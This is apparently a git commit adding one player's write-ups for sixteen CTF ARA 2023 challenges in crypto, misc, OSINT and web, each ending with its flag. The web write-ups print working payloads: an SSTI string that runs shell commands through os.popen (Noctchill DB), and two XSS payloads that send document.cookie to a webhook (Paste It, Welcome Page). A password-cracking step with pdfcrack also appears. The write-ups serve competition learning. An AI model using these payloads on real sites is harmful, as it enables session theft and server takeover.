feat: added CTF Ara 2023

CTF ARA 2023/@B4SH/README.md

@@ -0,0 +1,22 @@
+# @B4SH
+> Ailee had just moved out to a boarding house in the countryside to escape the fast-paced and hectic city life. She was very excited to start her life with a new environment, she was very happy before she found out that the room she rented was very dark. Suddenly she found out 2 strange papers on the wall behind the door that says:
+
+> "5A495A323032337B346D62793077625F677330663973675F677334675F2167355F345F733468733F7D".
+
+> Help Ailee to find what's behind the text written on the paper.
+
+## About the Challenge
+We have been given a string containing numbers and capital letters
+
+## How to Solve?
+To solve this chall, we need to change the string from `hex` to `ASCII`
+
+![hex](images/hex.png)
+
+Followed by decoding the string using Affine Cipher where A = 25 and B = 25
+
+![affine](images/affine.png)
+
+```
+ARA2023{4nyb0dy_th0u9ht_th4t_!t5_4_h4sh?}
+```

CTF ARA 2023/Babychall/README.md

@@ -0,0 +1,18 @@
+# Babychall
+> Welcome to ARACTF! To start the CTF, please translate this flag that I get from display banner! Good Morning
+
+## About the Challenge
+Given a file containing sets n1 n2 n3, and c1 c2 c3 (You can get the file [here](pairs_of_numbers.txt))
+
+![preview](images/preview.png)
+
+## How to Solve?
+To solve this problem, we can use the Chinese Remainder Theorem (CRT). Here I use this [reference](https://github.com/GiVeMeRoOt/CTFWRITEUPS/blob/master/RSA1/rsa.py)
+
+![code](images/code.png)
+
+![flag](images/flag.png)
+
+```
+ARA2023{s00000_much_c1ph3r_but_5m4ll_e_5t1ll_d0_th3_j0b}
+```

CTF ARA 2023/Babychall/pairs_of_numbers.txt

@@ -0,0 +1,7 @@
+c1=50996973104845663108379751131203085432412490198312714663656823648233038479298192861451834246930208140110173699058527919020115432586705400467345647806522331396447650847650133013246673390879222719169248862420278256322967718701700458729207793124758166438641448112314489945863231881982352790765130535004090053677
+c2=2675086354476975422055414666795504683242305948200761348250028401266882028494792724072473530888031343997988485639367375927974100307107406775103695198800703704181414736281388464205429123159605048186634852771717909704864647112817586024682299987868607933059634279556321476204813521201682662328510086496215821461
+c3=37230658243252590743608571105027357862790972987208833213017941171448753815654839901699526651433771324826895355671255944414893947963934979068257310367315935701270804390799121669635153012916402271190722618997500392911737767143316552376495882986935695146970853914275481717400268832644987157988727575513351441919
+
+n1=105481127267218260612156871017757694550142735824087150106750403579877495059230413046181301355871045357138033343315900732228502875706659244844711538497850413046440270578916645981161000807526427004236918404837363404678029443944950655102252423415631977020625826867728898231382737396728896847618010577420408630133
+n2=93105621059686474816890215494554802831518948420160941703522759121619785851270608634130307450227557987976818162331982289634215037184075864787223681218982602092806757888533587126974091077190242797461318907280759075612577475534626062060960739269828789274137274363970056276139434039315860052556417340696998509271
+n3=65918509650742278494971363290874849181268364316012656769339120004000702945271942533097529884964063109377036715847176196280943807261986848593000424143320280053279021411394267268255337783494901606319687457351586915314662800434632332988978858085931586830283694881538759008360486661936884202274973387108214754101

CTF ARA 2023/Backroom/README.md

@@ -0,0 +1,20 @@
+# Backroom
+> I found a place that give me a backroom vibes. I think I like this place, so I give this place 5 star. Can you find this place?
+
+## About the Challenge
+Given a photo and we have to find the name of this place where the photo was taken.
+
+![place](place.jpg)
+
+## How to Solve?
+To solve this problem, the first thing is to look at the file metadata first
+
+![metadata](images/metadata.png)
+
+There is a latitude and longitude where the photo was taken, if you go to Google maps it will be directed to the `Hi Tech Mall` location in `Surabaya`. And then if you look at the review of the place, you will found the flag
+
+![flag](images/flag.png)
+
+```
+ARA2023{c4r3full_w1th_y0uR_m3tad4ta}
+```

CTF ARA 2023/D0ts N D4sh3s/README.md

@@ -0,0 +1,20 @@
+# D0ts N D4sh3s
+> Albert was lost in a deep forest surrounded by a sea and tried to escape by sending a SOS signal containing a code.
+
+> Jack who works at a lighthouse realized that someone was sending a SOS signal and responses as fast as he can.
+
+> What do you think Albert tries to say?
+
+## About the Challenge
+A google drive link is given which, if opened, will be directed to a file called `The Morse.txt` and the file contains Morse code. (You can get the file [here](The%20Morse.txt))
+
+![morse](images/morse.png)
+
+## How to Solve?
+To solve this chall, use the `Morse Code Translator` and then continue by changing binary to ASCII, so we will get a flag
+
+![flag](images/flag.png)
+
+```
+ARA2023{!ts_ju5t_4_m0rs3_aft312_a1!}
+```

CTF ARA 2023/D0ts N D4sh3s/The Morse.txt

@@ -0,0 +1 @@
+----- .---- ----- ----- ----- ----- ----- .---- / ----- .---- ----- .---- ----- ----- .---- ----- / ----- .---- ----- ----- ----- ----- ----- .---- / ----- ----- .---- .---- ----- ----- .---- ----- / ----- ----- .---- .---- ----- ----- ----- ----- / ----- ----- .---- .---- ----- ----- .---- ----- / ----- ----- .---- .---- ----- ----- .---- .---- / ----- .---- .---- .---- .---- ----- .---- .---- / ----- ----- .---- ----- ----- ----- ----- .---- / ----- .---- .---- .---- ----- .---- ----- ----- / ----- .---- .---- .---- ----- ----- .---- .---- / ----- .---- ----- .---- .---- .---- .---- .---- / ----- .---- .---- ----- .---- ----- .---- ----- / ----- .---- .---- .---- ----- .---- ----- .---- / ----- ----- .---- .---- ----- .---- ----- .---- / ----- .---- .---- .---- ----- .---- ----- ----- / ----- .---- ----- .---- .---- .---- .---- .---- / ----- ----- .---- .---- ----- .---- ----- ----- / ----- .---- ----- .---- .---- .---- .---- .---- / ----- .---- .---- ----- .---- .---- ----- .---- / ----- ----- .---- .---- ----- ----- ----- ----- / ----- .---- .---- .---- ----- ----- .---- ----- / ----- .---- .---- .---- ----- ----- .---- .---- / ----- ----- .---- .---- ----- ----- .---- .---- / ----- .---- ----- .---- .---- .---- .---- .---- / ----- .---- .---- ----- ----- ----- ----- .---- / ----- .---- .---- ----- ----- .---- .---- ----- / ----- .---- .---- .---- ----- .---- ----- ----- / ----- ----- .---- .---- ----- ----- .---- .---- / ----- ----- .---- .---- ----- ----- ----- .---- / ----- ----- .---- .---- ----- ----- .---- ----- / ----- .---- ----- .---- .---- .---- .---- .---- / ----- .---- .---- ----- ----- ----- ----- .---- / ----- ----- .---- .---- ----- ----- ----- .---- / ----- ----- .---- ----- ----- ----- ----- .---- / ----- .---- .---- .---- .---- .---- ----- .----

CTF ARA 2023/DewaWeb/README.md

@@ -0,0 +1,30 @@
+# DewaWeb
+> Dewaweb sedang mencari talenta terhebat!
+
+> Kamu adalah seorang inspektur terkenal yang telah dikenal mampu untuk memecahkan seluruh teka-teki. Tidak ada sesuatu yang luput dari penglihatanmu, bahkan untuk sesuatu yang tidak terlihat oleh mata orang biasa. Dewaweb mencari orang sepertimu.
+
+> Saat ini Dewaweb ingin menguji keahlian analisamu. Coba temukan apa yang Dewaweb sembunyikan di website ini. Buktikan bahwa kamu adalah seseorang yang pantas untuk Dewaweb!
+
+## About the Challenge
+Given a static web link about Dewaweb.
+
+## How to Solve?
+To solve this chall it is required to find the parts of each flag (There are 4 parts of the flag). The first part is in the `index.html` file
+
+![part-1](images/part-1.png)
+
+The second part can be found in the JavaScript file (`/js/custom.js`)
+
+![part-2](images/part-2.png)
+
+The third part can be found in the CSS file ()`/css/style.css`)
+
+![part-3](images/part-3.png)
+
+Then the last part can be found in the website `Cookie` response header
+
+![part-4](images/part-4.png)
+
+```
+ARA2023{s4nt4I_ dUlu_ g4k_ s1h?XD}
+```

CTF ARA 2023/In-sanity check/README.md

@@ -0,0 +1,14 @@
+# In-sanity check
+> Even the flag for sanity check is gone?
+
+## About the Challenge
+We are given a link which if pressed then the user will be redirected to a google docs
+
+## How to Solve?
+To solve this, you can look at the Google Docs editing history to get the flag
+
+![history](images/history.png)
+
+```
+ARA2023{w3lc0m3_4nd_h4v3_4_gr3at_ctfs}
+```

CTF ARA 2023/L0v32x0r/README.md

@@ -0,0 +1,18 @@
+# L0v32x0r
+> Vonny and Zee were having a treasure hunt game until they realized that one of the clues was a not alike the other clues as it has a random text written on the clue.
+
+> The clue was "001300737173723a70321e3971331e352975351e247574387e3c".
+
+> Help them to find what the hidden clue means!
+
+## About the Challenge
+Given a string containing a combination of numbers and letters
+
+## How to Solve?
+To solve this problem use XOR Decoder and then we will get the flag
+
+![flag](images/flag.png)
+
+```
+ARA2023{1s_x0r_th4t_e45y?}
+```

CTF ARA 2023/Noctchill DB/README.md

@@ -0,0 +1,38 @@
+# Noctchill DB
+> Checkout my Noctchill Database Page.
+
+## About the Challenge
+Given a website along with its source code (You can get the source code [here](web_noctchill_db.zip)), when we open the website we will be met with shiny color members :D.
+
+![preview](images/preview.png)
+
+And then when I checking the code, apparently there is no filter in the idol detail endpoint section which can result in Server-Side Template Injection (SSTI)
+
+![code](images/code.png)
+
+![template](images/template.png)
+
+## How to Solve?
+First I test the website using the payload as below
+
+```
+http://103.152.242.116:6712/{{7*7}}
+```
+
+And it turns out that the output is `49` which means vulnerable to SSTI
+
+![test](images/test.png)
+
+After testing a lot of payloads and reading other CTF event writeups, I found the final payload to perform RCE on the server
+
+```
+http://103.152.242.116:6712/{{url_for.__globals__.os.__dict__.popen(request.args.file).read()}}?file=ls /
+```
+
+![rce](images/rce.png)
+
+Open the `flag_68b329da98.txt` file to get the flag
+
+```
+ARA2023{its_n0t_th4t_h4rd_r1ghT??}
+```

CTF ARA 2023/One Time Password/README.md

@@ -0,0 +1,20 @@
+# One Time Password
+> bwoah, some innovative challenges
+
+## About the Challenge
+Given a file called `one_time_password.txt` and when we open the file, the contents are like this
+```
+A: 161a1812647a765b37207a1c3b1a7b54773c2b660c46643a1a50662b3b3e42
+B: 151d616075737f322e2d130b381666547d3d4470054660287f33663d2a2e32
+
+XOR: 415241323032337b7468335f705f3574346e64355f6630725f7034647a7a7d
+```
+
+## How to Solve?
+To solve this problem all that is needed is to change the XOR result from Hex to ASCII
+
+![flag](images/flag.png)
+
+```
+ARA2023{th3_p_5t4nd5_f0r_p4dzz}
+```

CTF ARA 2023/Paste It/README.md

@@ -0,0 +1,32 @@
+# Paste It
+> I made my own "Pastebin", its called "Paste It". It's 100% Free and 101% Secure. What you waiting for? share your paste to your friend right now!.
+
+## About the Challenge
+Provided the website along with the source code (You can get the source code [here](web_pasteit.zip)). The website has a function to enter a link that will be shared, and later our input results can be shared with other people
+
+![preview](images/preview.png)
+
+## How to Solve?
+After checking the source code there is `DOMPurify` which makes us unable to enter the XSS payload directly into the form. This can be bypassed by referring to this [website](https://portswigger.net/research/bypassing-dompurify-again-with-mutation-xss)
+
+Then there is also a filter if the input contains the string `http` or `www.` Then it will be replaced with `a` tag. but this can still be bypassed by separating between `http` or using a double slash `//`
+
+![filter](images/filter.png)
+
+So the final payload is:
+```
+<math><mtext><table><mglyph><style><!--</style><img title="--></mglyph><img src=1
+onerror=window.location.replace('htt'+'ps://webhook.site/?test='+document.cookie)>;">
+```
+
+And then after XSS payload works successfully, then give an `id` to the admin by requesting the endpoint `/api/report` with the body `id`
+
+![report](images/report.png)
+
+Check the webhook and there will be a flag on `Request Details`
+
+![flag](images/flag.png)
+
+```
+ARA2023{pr07otyp3_p0llUt10n_g4Dg3t_t0_g3t_XSS}
+```

CTF ARA 2023/Pollution/README.md

@@ -0,0 +1,16 @@
+# Pollution
+> Flag is on the admin side.
+
+## About the Challenge
+Given a website file along with the source code (You can get the source code [here](web_pollution_fix.zip)). On the website there is 1 endpoint named `/register` where if we can set the role to Admin and we know the secret web, then we can get the flag
+
+![preview](images/preview.png)
+
+## How to Solve?
+To solve this chall, according to the title we have to do a pollution prototype. By using this reference https://portswigger.net/web-security/prototype-pollution, the request will look like this
+
+![flag](images/flag.png)
+
+```
+ARA2023{e4sy_Pro70typ3_p0llut1oN}
+```

CTF ARA 2023/README.md

@@ -0,0 +1,21 @@
+# CTF ARA 2023
+CTF writeup for The CTF ARA 2023. I took part in this CTF competition solo, and got ~20th? place out of 93 teams
+
+| Category | Challenge
+| --- | --- |
+| Web | [DewaWeb](/CTF%20ARA%202023/DewaWeb/)
+| Web | [Pollution](/CTF%20ARA%202023/Pollution/)
+| Web | [Paste It](/CTF%20ARA%202023/Paste%20It/)
+| Web | [Noctchill DB](/CTF%20ARA%202023/Noctchill%20DB/)
+| Web | [Welcome Page](/CTF%20ARA%202023/Welcome%20Page/)
+| Web | [X-Is for blabla](/CTF%20ARA%202023/X-Is%20for%20blabla/)
+| Crypto | [One Time Password (?)](/CTF%20ARA%202023/One%20Time%20Password/)
+| Crypto | [Secrets Behind a Letter](/CTF%20ARA%202023/Secrets%20Behind%20a%20Letter/)
+| Crypto | [L0v32x0r](/CTF%20ARA%202023/L0v32x0r/)
+| Crypto | [Babychall](/CTF%20ARA%202023/Babychall/)
+| Misc | [In-sanity check](/CTF%20ARA%202023/In-sanity%20check/)
+| Misc | [@B4SH](/CTF%20ARA%202023/%40B4SH/)
+| Misc | [D0ts N D4sh3s](/CTF%20ARA%202023/D0ts%20N%20D4sh3s/)
+| Misc | [Truth](/CTF%20ARA%202023/Truth/)
+| Osint | [Time Machine](/CTF%20ARA%202023/Time%20Machine/)
+| Osint | [Backroom](/CTF%20ARA%202023/Backroom/)

CTF ARA 2023/Secrets Behind a Letter/README.md

@@ -0,0 +1,39 @@
+# Secrets Behind a Letter
+> Melon and Edith went to an labyrinth and they should break the code written on a letter in a box in order to escape the labyrinth.
+
+> Open the letter and break the code
+
+## About the Challenge
+Given a file containing `p`, `q`, `e`, and `c`
+```
+p:
+12575333694121267690521971855691638144136810331188248236770880338905811883
+48506410486564983492781972561769555447210034136189616202231165330153281010
+1344273
+q:
+12497483426175072465852167936960526232284891876787981080671162783561411521
+67580911220457361735838974273254629350270958512920588572607849241710986751
+2398747
+c:
+36062934495731792908639535062833180651022813589535592851802572264328299027
+40641392734685245421762779331514489294202688698082362224015740571749978795
+99430405407341221428388984827675412726778370913038246699129635727146561394
+22011853028133556111405072526509839846701570133437746102727644982344712571
+844332280218
+e = 65537
+```
+
+The variable `c` is the encrypted flag. The variable `e` is the exponent, and `p` and `q` are the two prime numbers used to generate the private and public keys.
+
+## How to Solve?
+To solve this problem, I created a python script like the image below (You can access the solver [here])
+
+![code](images/code.png)
+
+The variable `n` is the RSA modulus, which is the result of multiplying `p` and `q`. Next, the variable `phi` is calculated using Euler's totient function, namely `(p-1)*(q-1)`. The variable `d` is then calculated using the inverse modulo of `e` and `phi`, which are the RSA private keys. And in the last line, the `pow()` function is used to calculate flags that have been encrypted using the public key, using the private key. The result is converted to bytes using the `long_to_bytes()` function and we get the flag.
+
+![flag](images/flag.png)
+
+```
+ARA2023{1t_turn5_0ut_to_b3_an_rsa}
+```

CTF ARA 2023/Time Machine/README.md

@@ -0,0 +1,16 @@
+# Time Machine
+> There was a secret leaked on Official ARA Website. It can only seen on January 22nd 2023. Can you turn back the time?
+
+## About the Challenge
+In the description of the question, it is explained that the flag is stored in the website on January 22
+
+## How to Solve?
+To solve this problem, I use https://web.archive.org and enter the official website to get the flag
+
+![flag](images/flag.png)
+
+You can find the flag at line 395
+
+```
+ARA2023{d1gIt4l_f00tpr1nt_1s_sC4ry}
+```

CTF ARA 2023/Truth/README.md

@@ -0,0 +1,26 @@
+# Truth
+> Kuronushi traveled far away from his country to learn something about himself. He never sure about his identity. Untill One day, he met a sage who gave him a book of truth. The sage said " To understand about yourself,Erase the title and find the Bigger case"
+
+> Submit the flag on this format ARA2023{} Separate the sentences with _
+
+## About the Challenge
+Given a PDF file that is locked using a password (You can get the file [here](Truth.pdf))
+
+## How to Solve?
+To solve this problem, I use `pdfcrack` to bruteforce the PDF using the `rockyou.txt` wordlist
+
+![pdfcrack](images/pdfcrack.png)
+
+The password for the PDF is `subarukun` and when I open the file, the PDF contains a kind of story that has 4 pages
+
+![content](images/content.png)
+
+And then in the question there is a hint `Erase the title and find the Bigger case`. So I removed the title and searched for words that were capitalized
+
+![capital](images/capital_letter.png)
+
+If only the capital letters are taken, a flag will be formed
+
+```
+ARA2023{SOUNDS_LIKE_FANDAGO}
+```

CTF ARA 2023/Welcome Page/README.md

@@ -0,0 +1,30 @@
+# Welcome Page
+> Flag is on the admin cookie.
+
+## About the Challenge
+Given 2 websites, a plain website and the admin bot, we will probably do XSS to get the admin cookies. If you open the link, a plain website will appear and the words `Welcome!` this happens because there is 1 GET parameter named `msg` whose value we can change.
+
+![preview](images/preview.png)
+
+## How to Solve?
+When viewing the source code, it can be identified that this website uses Vue. And after searching especially on the [portswigger website](https://portswigger.net/web-security/crosssitescripting/cheat-sheet) I found a working payload which is
+
+```
+http://103.152.242.116:8413/?msg={{_openBlock.constructor('alert(1)')()}}
+```
+
+![alert](images/alert.png)
+
+After confirming that an alert appears, using a webhook on the XSS payload so that we can get the admin cookies
+
+```
+http://103.152.242.116:8413/?msg={{_openBlock.constructor('location.href="https://webhook/?test="+document.cookie')()}}
+```
+
+Send the XSS payload to the admin and get the cookies
+
+![flag](images/flag.png)
+
+```
+ARA2023{sUp3r_s3cr3t_c00k13_1s_h3r3}
+```

CTF ARA 2023/X-Is for blabla/README.md

@@ -0,0 +1,28 @@
+# X-Is for blabla
+> Recently my friend was buy helmet called RFC 2616, pretty strange huh?
+
+## About the Challenge
+Given a plain website (There are only pictures and text), but when you look at the HTML code there is a new file called `readme.html` which contains something like a story
+
+![readme](images/readme.png)
+
+## How to Solve?
+To solve this chall, we must adjust the conditions of `readme.html.` So there are 5 conditions that must be met to get the flag:
+
+* Language must be set to `ja` (Japan)
+* Browser must be set to `Omaga`
+* Set operation system to `Wengdows`
+* Tracker settings
+* Then there is a `Cake` that must be set (There are 2 conditions namely the `Number 1337` and the name of the girl is `Araa`)
+
+The HTTP request will be looks like this
+
+![request](images/request.png)
+
+And in the response a flag will appear
+
+![flag](images/flag.png)
+
+```
+ARA2023{H3ad_1s_ImP0rt4Nt}
+```